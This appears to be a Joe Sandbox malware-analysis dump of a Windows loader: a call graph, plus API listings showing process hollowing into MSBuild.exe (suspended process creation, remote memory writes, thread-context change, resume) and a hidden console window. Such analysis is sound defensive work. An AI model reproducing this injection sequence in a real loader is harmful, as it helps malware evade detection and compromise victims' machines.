API calls 20536->20537 20538 a61fa3 20537->20538 20538->20458 20540 a61013 20539->20540 20755 a62750 20540->20755 20553 a614f0 20549->20553 20554 a61702 _AnonymousOriginator 20553->20554 20555 a616dd 20553->20555 20559 a64320 20553->20559 20572 a61750 20553->20572 20586 a61d10 20553->20586 20554->20530 20555->20554 20594 a77ddf 29 API calls 2 library calls 20555->20594 20560 a64364 20559->20560 20561 a6444e 20559->20561 20563 a643a5 20560->20563 20564 a6437e 20560->20564 20570 a64393 codecvt 20560->20570 20595 a62610 30 API calls 2 library calls 20561->20595 20567 a6a663 codecvt 3 API calls 20563->20567 20564->20561 20566 a6438a 20564->20566 20569 a6a663 codecvt 3 API calls 20566->20569 20567->20570 20569->20570 20571 a64424 _AnonymousOriginator 20570->20571 20596 a77ddf 29 API calls 2 library calls 20570->20596 20571->20553 20573 a61788 _strlen 20572->20573 20576 a61833 20573->20576 20583 a6180d 20573->20583 20623 a62c50 20573->20623 20576->20583 20597 a64460 20576->20597 20578 a61b8e 20579 a61b9f 20578->20579 20633 a638e0 39 API calls 2 library calls 20578->20633 20579->20553 20583->20578 20634 a62f00 38 API calls std::ios_base::_Init 20583->20634 20635 a632c0 30 API calls 5 library calls 20583->20635 20636 a7060c RaiseException 20583->20636 20584 a6188d 20584->20583 20614 a6def0 20584->20614 20587 a61d5c 20586->20587 20588 a64460 67 API calls 20587->20588 20589 a61d70 20588->20589 20741 a64b10 20589->20741 20592 a62c50 39 API calls 20593 a61deb 20592->20593 20593->20553 20595->20570 20637 a6a9f4 20597->20637 20600 a6a9f4 std::_Lockit::_Lockit 7 API calls 20601 a644b7 20600->20601 20643 a6aa25 20601->20643 20602 a6aa25 std::_Lockit::~_Lockit 2 API calls 20604 a64585 20602->20604 20603 a644d8 20613 a64556 20603->20613 20650 a645f0 67 API calls 2 library calls 20603->20650 20604->20584 20607 a6453b 20608 a64543 20607->20608 20609 a64598 20607->20609 20651 a6ab43 RaiseException _Yarn Concurrency::cancel_current_task 20608->20651 20652 a63e50 RaiseException Concurrency::cancel_current_task 20609->20652 20613->20602 20615 a6df17 20614->20615 20619 a6df1e 20614->20619 20616 a6a6e1 _ValidateLocalCookies 5 API calls 20615->20616 20617 a6e01c 20616->20617 20617->20584 20618 a6df69 20618->20615 20657 a6dada 20618->20657 20619->20615 20619->20618 20621 a6dfd0 20619->20621 20621->20615 20660 a7932d 20621->20660 20624 a62d5a 20623->20624 20625 a62c90 20623->20625 20624->20576 20626 a62cb3 20625->20626 20627 a62c50 39 API calls 20625->20627 20631 a62cd7 20625->20631 20626->20624 20737 a638e0 39 API calls 2 library calls 20626->20737 20627->20631 20631->20626 20738 a62f00 38 API calls std::ios_base::_Init 20631->20738 20739 a632c0 30 API calls 5 library calls 20631->20739 20740 a7060c RaiseException 20631->20740 20633->20579 20634->20583 20635->20583 20636->20583 20638 a6aa03 20637->20638 20639 a6aa0a 20637->20639 20653 a7810f 6 API calls std::_Lockit::_Lockit 20638->20653 20641 a6449a 20639->20641 20654 a6fac8 EnterCriticalSection 20639->20654 20641->20600 20641->20603 20644 a6aa2f 20643->20644 20645 a7811d 20643->20645 20649 a6aa42 20644->20649 20655 a6fad6 LeaveCriticalSection 20644->20655 20656 a780f8 LeaveCriticalSection 20645->20656 20648 a78124 20648->20603 20649->20603 20650->20607 20651->20613 20653->20641 20654->20641 20655->20649 20656->20648 20664 a78d91 20657->20664 20659 a6dae8 20659->20615 20661 a79340 _Fputc 20660->20661 20711 a7950e 20661->20711 20663 a79355 _Fputc 20663->20615 20665 a78da4 _Fputc 20664->20665 20668 a78f33 20665->20668 20667 a78db3 _Fputc 20667->20659 20669 a78f3f ___scrt_is_nonwritable_in_current_image 20668->20669 20670 a78f46 20669->20670 20671 a78f6b 20669->20671 20709 a77f78 29 API calls 2 library calls 20670->20709 20679 a73315 EnterCriticalSection 20671->20679 20674 a78f61 20674->20667 20675 a78f7a 20680 a78dc7 20675->20680 20679->20675 20681 a78dfe 20680->20681 20682 a78dec 20680->20682 20684 a7f704 __fread_nolock 29 API calls 20681->20684 20683 a78eff _Fputc 66 API calls 20682->20683 20696 a78df6 20683->20696 20685 a78e05 20684->20685 20686 a7f704 __fread_nolock 29 API calls 20685->20686 20691 a78e2d 20685->20691 20688 a78e16 20686->20688 20687 a6a6e1 _ValidateLocalCookies 5 API calls 20689 a78efd 20687->20689 20688->20691 20694 a7f704 __fread_nolock 29 API calls 20688->20694 20710 a78fbb LeaveCriticalSection __fread_nolock 20689->20710 20690 a78ee3 20693 a78eff _Fputc 66 API calls 20690->20693 20691->20690 20692 a7f704 __fread_nolock 29 API calls 20691->20692 20695 a78e60 20692->20695 20693->20696 20697 a78e22 20694->20697 20698 a78e83 20695->20698 20700 a7f704 __fread_nolock 29 API calls 20695->20700 20696->20687 20699 a7f704 __fread_nolock 29 API calls 20697->20699 20698->20690 20701 a78e9b 20698->20701 20699->20691 20702 a78e6c 20700->20702 20703 a7f430 _Fputc 41 API calls 20701->20703 20702->20698 20705 a7f704 __fread_nolock 29 API calls 20702->20705 20704 a78ead 20703->20704 20704->20696 20707 a78c30 _Fputc 66 API calls 20704->20707 20706 a78e78 20705->20706 20708 a7f704 __fread_nolock 29 API calls 20706->20708 20707->20704 20708->20698 20709->20674 20710->20674 20712 a7951c 20711->20712 20717 a79544 20711->20717 20713 a7954b 20712->20713 20714 a79529 20712->20714 20712->20717 20719 a795d1 20713->20719 20727 a77f78 29 API calls 2 library calls 20714->20727 20717->20663 20720 a795dd ___scrt_is_nonwritable_in_current_image 20719->20720 20728 a73315 EnterCriticalSection 20720->20728 20722 a795eb 20729 a79585 20722->20729 20726 a79583 20726->20663 20727->20717 20728->20722 20730 a7e68b 30 API calls 20729->20730 20731 a7959d 20730->20731 20732 a79367 66 API calls 20731->20732 20733 a795bb 20732->20733 20734 a7e774 64 API calls 20733->20734 20735 a795c7 20734->20735 20736 a79620 LeaveCriticalSection __fread_nolock 20735->20736 20736->20726 20737->20624 20738->20631 20739->20631 20740->20631 20742 a64b4f 20741->20742 20744 a62c50 39 API calls 20742->20744 20748 a64b6f 20742->20748 20744->20748 20746 a61de4 20746->20592 20747 a64c3e 20747->20746 20751 a638e0 39 API calls 2 library calls 20747->20751 20748->20747 20752 a62f00 38 API calls std::ios_base::_Init 20748->20752 20753 a632c0 30 API calls 5 library calls 20748->20753 20754 a7060c RaiseException 20748->20754 20751->20746 20752->20748 20753->20748 20754->20748 20756 a627ae 20755->20756 20757 a62c50 39 API calls 20756->20757 20760 a627fa 20756->20760 20765 a627d1 20756->20765 20757->20760 20760->20765 20775 a6cfb0 20760->20775 20761 a61028 20767 a61110 20761->20767 20762 a629de 20762->20761 20779 a638e0 39 API calls 2 library calls 20762->20779 20765->20762 20780 a62f00 38 API calls std::ios_base::_Init 20765->20780 20781 a632c0 30 API calls 5 library calls 20765->20781 20782 a7060c RaiseException 20765->20782 20768 a6115c 20767->20768 20783 a63c70 20768->20783 20773 a62c50 39 API calls 20774 a61031 20773->20774 20774->20469 20776 a6cfbf 20775->20776 20778 a6cfd2 codecvt 20775->20778 20776->20765 20777 a7932d 69 API calls 20777->20776 20778->20776 20778->20777 20779->20761 20780->20765 20781->20765 20782->20765 20784 a6a9f4 std::_Lockit::_Lockit 7 API calls 20783->20784 20785 a63caa 20784->20785 20786 a6a9f4 std::_Lockit::_Lockit 7 API calls 20785->20786 20788 a63ce5 20785->20788 20787 a63cc4 20786->20787 20790 a6aa25 std::_Lockit::~_Lockit 2 API calls 20787->20790 20791 a6a663 codecvt 3 API calls 20788->20791 20801 a63daf 20788->20801 20789 a6aa25 std::_Lockit::~_Lockit 2 API calls 20792 a61170 20789->20792 20790->20788 20793 a63d4a 20791->20793 20802 a63a00 20792->20802 20816 a63e90 67 API calls 4 library calls 20793->20816 20795 a63d7c 20817 a6ecbf 39 API calls __Getctype 20795->20817 20797 a63d97 20818 a64010 65 API calls 3 library calls 20797->20818 20799 a63da2 20819 a6ab43 RaiseException _Yarn Concurrency::cancel_current_task 20799->20819 20801->20789 20804 a63a3f 20802->20804 20803 a63b2d 20807 a611e4 20803->20807 20854 a638e0 39 API calls 2 library calls 20803->20854 20805 a62c50 39 API calls 20804->20805 20808 a63a85 20804->20808 20812 a63a5f 20804->20812 20805->20808 20807->20773 20808->20812 20820 a6cb22 20808->20820 20832 a6cb40 20808->20832 20841 a6cb32 20808->20841 20812->20803 20855 a62f00 38 API calls std::ios_base::_Init 20812->20855 20856 a632c0 30 API calls 5 library calls 20812->20856 20857 a7060c RaiseException 20812->20857 20816->20795 20817->20797 20818->20799 20819->20801 20821 a6cb29 20820->20821 20828 a6cb75 20820->20828 20861 a73315 EnterCriticalSection 20821->20861 20823 a6cb79 20825 a6a6e1 _ValidateLocalCookies 5 API calls 20823->20825 20824 a6cb2e 20824->20812 20826 a6cc48 20825->20826 20826->20812 20828->20823 20829 a6cc09 20828->20829 20830 a6cba9 20828->20830 20829->20823 20831 a7932d 69 API calls 20829->20831 20830->20823 20858 a6c44d 20830->20858 20831->20823 20833 a6cb63 20832->20833 20835 a6cb5c 20832->20835 20833->20835 20838 a6cc09 20833->20838 20839 a6cba9 20833->20839 20834 a6a6e1 _ValidateLocalCookies 5 API calls 20836 a6cc48 20834->20836 20835->20834 20836->20812 20837 a6c44d _Fputc 68 API calls 20837->20835 20838->20835 20840 a7932d 69 API calls 20838->20840 20839->20835 20839->20837 20840->20835 20842 a6cb39 20841->20842 20846 a6cb85 20841->20846 20898 a73329 LeaveCriticalSection 20842->20898 20844 a6cb10 20844->20812 20845 a6cb3e 20845->20812 20846->20844 20847 a6cc09 20846->20847 20848 a6cbea 20846->20848 20849 a6cbfb 20847->20849 20850 a7932d 69 API calls 20847->20850 20848->20849 20852 a6c44d _Fputc 68 API calls 20848->20852 20851 a6a6e1 _ValidateLocalCookies 5 API calls 20849->20851 20850->20849 20853 a6cc48 20851->20853 20852->20849 20853->20812 20854->20807 20855->20812 20856->20812 20857->20812 20862 a78bfc 20858->20862 20860 a6c45d 20860->20823 20861->20824 20863 a78c0f _Fputc 20862->20863 20866 a78c5d 20863->20866 20865 a78c1e _Fputc 20865->20860 20867 a78c69 ___scrt_is_nonwritable_in_current_image 20866->20867 20868 a78c96 20867->20868 20869 a78c72 20867->20869 20882 a73315 EnterCriticalSection 20868->20882 20888 a77f78 29 API calls 2 library calls 20869->20888 20872 a78c9f 20873 a78cb4 20872->20873 20889 a7f704 20872->20889 20875 a78d51 20873->20875 20876 a78d20 20873->20876 20883 a78c30 20875->20883 20896 a77f78 29 API calls 2 library calls 20876->20896 20879 a78d5d 20897 a78d89 LeaveCriticalSection __fread_nolock 20879->20897 20880 a78c8b _Fputc 20880->20865 20882->20872 20884 a78c4f 20883->20884 20885 a78c3e 20883->20885 20884->20879 20886 a84a37 _Fputc 66 API calls 20885->20886 20887 a78c4a 20886->20887 20887->20879 20888->20880 20890 a7f725 20889->20890 20891 a7f710 20889->20891 20890->20873 20892 a776e4 __dosmaperr 14 API calls 20891->20892 20893 a7f715 20892->20893 20894 a77dcf __strnicoll 29 API calls 20893->20894 20895 a7f720 20894->20895 20895->20873 20896->20880 20897->20880 20898->20845 20899->20482 20900 a615d0 20911 a61e40 20900->20911 20902 a615db 20903 a616dd 20902->20903 20904 a64320 30 API calls 20902->20904 20907 a61750 103 API calls 20902->20907 20910 a61d10 75 API calls 20902->20910 20905 a61702 _AnonymousOriginator 20903->20905 20917 a77ddf 29 API calls 2 library calls 20903->20917 20904->20902 20907->20902 20910->20902 20912 a61e63 _Fputc 20911->20912 20918 a73558 20912->20918 20914 a61e7c 20915 a6a6e1 _ValidateLocalCookies 5 API calls 20914->20915 20916 a61e8c 20915->20916 20916->20902 20919 a7356c _Fputc 20918->20919 20920 a7358e 20919->20920 20922 a735b5 20919->20922 20933 a77f78 29 API calls 2 library calls 20920->20933 20925 a74d0d 20922->20925 20924 a735a9 _Fputc 20924->20914 20926 a74d19 ___scrt_is_nonwritable_in_current_image 20925->20926 20934 a73315 EnterCriticalSection 20926->20934 20928 a74d27 20935 a746e2 20928->20935 20932 a74d45 20932->20924 20933->20924 20934->20928 20947 a7e68b 20935->20947 20937 a74709 20954 a73b31 20937->20954 20944 a6a6e1 _ValidateLocalCookies 5 API calls 20945 a7477c 20944->20945 20946 a74d5c LeaveCriticalSection __fread_nolock 20945->20946 20946->20932 20977 a7e736 20947->20977 20949 a7e6fe 20949->20937 20950 a7e69c _Fputc 20950->20949 20984 a7bf11 20950->20984 20953 a7bed7 ___free_lconv_mon 14 API calls 20953->20949 21005 a73a93 20954->21005 20957 a73b57 21011 a77f78 29 API calls 2 library calls 20957->21011 20959 a73b74 20970 a73861 20959->20970 20964 a739f2 66 API calls 20965 a73b7f std::_Locinfo::_Locinfo_dtor 20964->20965 20965->20959 20965->20964 20966 a73d73 20965->20966 21012 a73790 39 API calls _Fputc 20965->21012 21013 a73de1 29 API calls 20965->21013 21014 a73e59 70 API calls 2 library calls 20965->21014 21015 a73fb2 70 API calls 2 library calls 20965->21015 21016 a77f78 29 API calls 2 library calls 20966->21016 20968 a73d8d 21017 a77f78 29 API calls 2 library calls 20968->21017 20971 a7bed7 ___free_lconv_mon 14 API calls 20970->20971 20972 a73871 20971->20972 20973 a7e774 20972->20973 20974 a7476a 20973->20974 20975 a7e77f 20973->20975 20974->20944 20975->20974 21020 a785b8 20975->21020 20978 a7e742 _Fputc 20977->20978 20979 a7e76c 20978->20979 20980 a7f704 __fread_nolock 29 API calls 20978->20980 20979->20950 20981 a7e75d 20980->20981 20991 a8744f 20981->20991 20983 a7e763 20983->20950 20985 a7bf4f 20984->20985 20989 a7bf1f __Getctype 20984->20989 21004 a776e4 14 API calls __dosmaperr 20985->21004 20986 a7bf3a RtlAllocateHeap 20988 a7bf4d 20986->20988 20986->20989 20988->20953 20989->20985 20989->20986 21003 a75877 EnterCriticalSection LeaveCriticalSection codecvt 20989->21003 20992 a87469 20991->20992 20993 a8745c 20991->20993 20995 a87475 20992->20995 21001 a776e4 14 API calls __dosmaperr 20992->21001 21000 a776e4 14 API calls __dosmaperr 20993->21000 20995->20983 20997 a87461 20997->20983 20998 a87496 21002 a77dcf 29 API calls __strnicoll 20998->21002 21000->20997 21001->20998 21002->20997 21003->20989 21004->20988 21006 a73ac0 21005->21006 21007 a73a9e 21005->21007 21019 a735fc 29 API calls 3 library calls 21006->21019 21018 a77f78 29 API calls 2 library calls 21007->21018 21010 a73ab9 21010->20957 21010->20959 21010->20965 21011->20959 21012->20965 21013->20965 21014->20965 21015->20965 21016->20968 21017->20959 21018->21010 21019->21010 21021 a785d1 21020->21021 21025 a785f8 21020->21025 21022 a7f704 __fread_nolock 29 API calls 21021->21022 21021->21025 21023 a785ed 21022->21023 21026 a83e10 21023->21026 21025->20974 21027 a83e1c ___scrt_is_nonwritable_in_current_image 21026->21027 21028 a83e5d 21027->21028 21029 a83ea3 21027->21029 21036 a83e24 21027->21036 21066 a77f78 29 API calls 2 library calls 21028->21066 21037 a83868 EnterCriticalSection 21029->21037 21032 a83ea9 21033 a83ec7 21032->21033 21038 a83bf4 21032->21038 21067 a83f19 LeaveCriticalSection __fread_nolock 21033->21067 21036->21025 21037->21032 21039 a83c1c 21038->21039 21063 a83c3f __fread_nolock 21038->21063 21040 a83c20 21039->21040 21042 a83c7b 21039->21042 21082 a77f78 29 API calls 2 library calls 21040->21082 21043 a83c99 21042->21043 21083 a829a2 31 API calls __fread_nolock 21042->21083 21068 a83f21 21043->21068 21047 a83cf8 21051 a83d0c 21047->21051 21052 a83d61 WriteFile 21047->21052 21048 a83cb1 21049 a83cb9 21048->21049 21050 a83ce0 21048->21050 21049->21063 21084 a84365 6 API calls _Fputc 21049->21084 21085 a83f9e 45 API calls 4 library calls 21050->21085 21055 a83d4d 21051->21055 21056 a83d14 21051->21056 21054 a83d83 GetLastError 21052->21054 21065 a83cf3 21052->21065 21054->21065 21075 a843cd 21055->21075 21057 a83d39 21056->21057 21058 a83d19 21056->21058 21087 a84591 8 API calls 2 library calls 21057->21087 21061 a83d22 21058->21061 21058->21063 21086 a844a8 7 API calls 2 library calls 21061->21086 21063->21033 21065->21063 21066->21036 21067->21036 21069 a8744f __fread_nolock 29 API calls 21068->21069 21071 a83f33 21069->21071 21070 a83cab 21070->21047 21070->21048 21071->21070 21072 a83f61 21071->21072 21088 a73790 39 API calls _Fputc 21071->21088 21072->21070 21073 a83f7b GetConsoleMode 21072->21073 21073->21070 21079 a843dc _Fputc 21075->21079 21076 a8448d 21077 a6a6e1 _ValidateLocalCookies 5 API calls 21076->21077 21078 a844a6 21077->21078 21078->21063 21079->21076 21080 a8444c WriteFile 21079->21080 21080->21079 21081 a8448f GetLastError 21080->21081 21081->21076 21082->21063 21083->21043 21084->21063 21085->21065 21086->21063 21087->21065 21088->21072 21089 a6b060 21112 a6afc4 GetModuleHandleExW 21089->21112 21092 a6b0a6 21094 a6afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21092->21094 21096 a6b0ac 21094->21096 21095 a6b09a 21121 a6efd2 21095->21121 21098 a6b0cd 21096->21098 21124 a6afa7 GetModuleHandleExW 21096->21124 21114 a67770 21098->21114 21100 a6b0bd 21100->21098 21101 a6b0c3 FreeLibraryWhenCallbackReturns 21100->21101 21101->21098 21102 a6b0dd 21103 a6afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21102->21103 21104 a6b0e3 21103->21104 21105 a6b111 21104->21105 21125 a6aefa 37 API calls std::_Throw_Cpp_error 21104->21125 21107 a6b0ef 21108 a6efd2 ReleaseSRWLockExclusive 21107->21108 21109 a6b102 21108->21109 21109->21105 21126 a6e95d WakeAllConditionVariable 21109->21126 21113 a6afda 21112->21113 21113->21092 21120 a6aefa 37 API calls std::_Throw_Cpp_error 21113->21120 21115 a677af 21114->21115 21127 a68aa0 21115->21127 21116 a677b9 21132 a6af64 CloseThreadpoolWork 21116->21132 21118 a677cb 21118->21102 21120->21095 21122 a6efdf ReleaseSRWLockExclusive 21121->21122 21123 a6efed 21121->21123 21122->21123 21123->21092 21124->21100 21125->21107 21126->21105 21128 a68add 21127->21128 21129 a68ae8 21128->21129 21133 a690e0 21128->21133 21150 a690f0 21128->21150 21129->21116 21132->21118 21134 a690ea 21133->21134 21166 a6efc1 21134->21166 21137 a69136 21139 a69143 21137->21139 21140 a691ce 21137->21140 21138 a691c7 21176 a6b317 30 API calls 2 library calls 21138->21176 21142 a69174 21139->21142 21143 a6914b 21139->21143 21177 a6b317 30 API calls 2 library calls 21140->21177 21147 a6efd2 ReleaseSRWLockExclusive 21142->21147 21145 a6efd2 ReleaseSRWLockExclusive 21143->21145 21146 a69151 std::_Throw_Cpp_error 21145->21146 21146->21129 21148 a69181 21147->21148 21169 a692f0 21148->21169 21151 a6efc1 12 API calls 21150->21151 21152 a6912b 21151->21152 21153 a69136 21152->21153 21154 a691c7 21152->21154 21155 a69143 21153->21155 21156 a691ce 21153->21156 21205 a6b317 30 API calls 2 library calls 21154->21205 21158 a69174 21155->21158 21159 a6914b 21155->21159 21206 a6b317 30 API calls 2 library calls 21156->21206 21162 a6efd2 ReleaseSRWLockExclusive 21158->21162 21161 a6efd2 ReleaseSRWLockExclusive 21159->21161 21165 a69151 std::_Throw_Cpp_error 21161->21165 21163 a69181 21162->21163 21164 a692f0 66 API calls 21163->21164 21164->21165 21165->21129 21178 a6eff1 GetCurrentThreadId 21166->21178 21194 a69620 21169->21194 21173 a6939f 21203 a69400 66 API calls std::_Throw_Cpp_error 21173->21203 21175 a693ae 21175->21146 21179 a6f03a 21178->21179 21180 a6f01b 21178->21180 21182 a6f043 21179->21182 21183 a6f05a 21179->21183 21181 a6f020 AcquireSRWLockExclusive 21180->21181 21189 a6f030 21180->21189 21181->21189 21184 a6f04e AcquireSRWLockExclusive 21182->21184 21182->21189 21185 a6f0b9 21183->21185 21192 a6f072 21183->21192 21184->21189 21187 a6f0c0 TryAcquireSRWLockExclusive 21185->21187 21185->21189 21186 a6a6e1 _ValidateLocalCookies 5 API calls 21188 a6912b 21186->21188 21187->21189 21188->21137 21188->21138 21189->21186 21191 a6f0a9 TryAcquireSRWLockExclusive 21191->21189 21191->21192 21192->21189 21192->21191 21193 a6fdcd GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 21192->21193 21193->21192 21195 a69667 21194->21195 21196 a6a663 codecvt 3 API calls 21195->21196 21197 a6935f 21196->21197 21198 a694f0 21197->21198 21199 a69536 std::_Throw_Cpp_error 21198->21199 21202 a69540 std::_Throw_Cpp_error 21199->21202 21204 a6b57d RaiseException Concurrency::cancel_current_task 21199->21204 21202->21173 21203->21175 21207 a9a19e 21212 a9a1d4 21207->21212 21208 a9a321 GetPEB 21209 a9a333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21208->21209 21210 a9a3da WriteProcessMemory 21209->21210 21209->21212 21211 a9a41f 21210->21211 21213 a9a461 WriteProcessMemory Wow64SetThreadContext ResumeThread 21211->21213 21214 a9a424 WriteProcessMemory 21211->21214 21212->21208 21212->21209 21214->21211

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A9A110,00A9A100), ref: 00A9A334
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00A9A347
                                                                                                  • Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 00A9A365
                                                                                                  • ReadProcessMemory.KERNELBASE(0000009C,?,00A9A154,00000004,00000000), ref: 00A9A389
                                                                                                  • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00A9A3B4
                                                                                                  • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00A9A40C
                                                                                                  • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00A9A457
                                                                                                  • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00A9A495
                                                                                                  • Wow64SetThreadContext.KERNEL32(000000A0,00910000), ref: 00A9A4D1
                                                                                                  • ResumeThread.KERNELBASE(000000A0), ref: 00A9A4E0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                  • API String ID: 2687962208-3857624555
                                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                  • Instruction ID: f5a3eb99b66f9a8db2a8a73044ae6ccee5d65214a079fca05d1e58d24bc1f8b9
                                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                  • Instruction Fuzzy Hash: 68B1F67664064AAFDB60CF68CC80BDA73E5FF88714F158125EA08AB341D774FA51CB94

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 00A61240: _strlen.LIBCMT ref: 00A612BA
                                                                                                  • CreateFileA.KERNELBASE ref: 00A62036
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00A62046
                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00A6206B
                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00A6207A
                                                                                                  • _strlen.LIBCMT ref: 00A620CD
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A621FD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2911764282-0
                                                                                                  • Opcode ID: 12ed7e9d1fc913ce74998b00e1f852d06ecfc5f1920e18b6ec82d85e97643611
                                                                                                  • Instruction ID: f9dfcd79ecc4fb36fd59339d90cfed842ed2653c4f0da184a95053e8f49ab613
                                                                                                  • Opcode Fuzzy Hash: 12ed7e9d1fc913ce74998b00e1f852d06ecfc5f1920e18b6ec82d85e97643611
                                                                                                  • Instruction Fuzzy Hash: 8171D0B2D006189FCB10DFA8DC44BAEBBB5FF49320F184629E815B7391E7359945CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4d3a3861aa74b00f9e110c2c3ff19c387152b35f0b7a5f4fc315bc4b480e06d9
                                                                                                  • Instruction ID: feb989187430ccf86363e8719cdb3e2e0cb913bc1f7d232487719da0ee0ac22c
                                                                                                  • Opcode Fuzzy Hash: 4d3a3861aa74b00f9e110c2c3ff19c387152b35f0b7a5f4fc315bc4b480e06d9
                                                                                                  • Instruction Fuzzy Hash: B7213A336141A50B8B9C9F386DA2037FF6ADB866A070A573AED129F2D1E521DD1082E4

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetConsoleWindow.KERNELBASE ref: 00A624DD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00A624E6
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A62524
                                                                                                    • Part of subcall function 00A6F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00A6253A,?,?,00000000), ref: 00A6F129
                                                                                                    • Part of subcall function 00A6F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00A6253A,?,?,00000000), ref: 00A6F142
                                                                                                    • Part of subcall function 00A6F11D: CloseHandle.KERNEL32(?,?,?,00A6253A,?,?,00000000), ref: 00A6F154
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A62567
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A62578
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A62589
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A6259A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
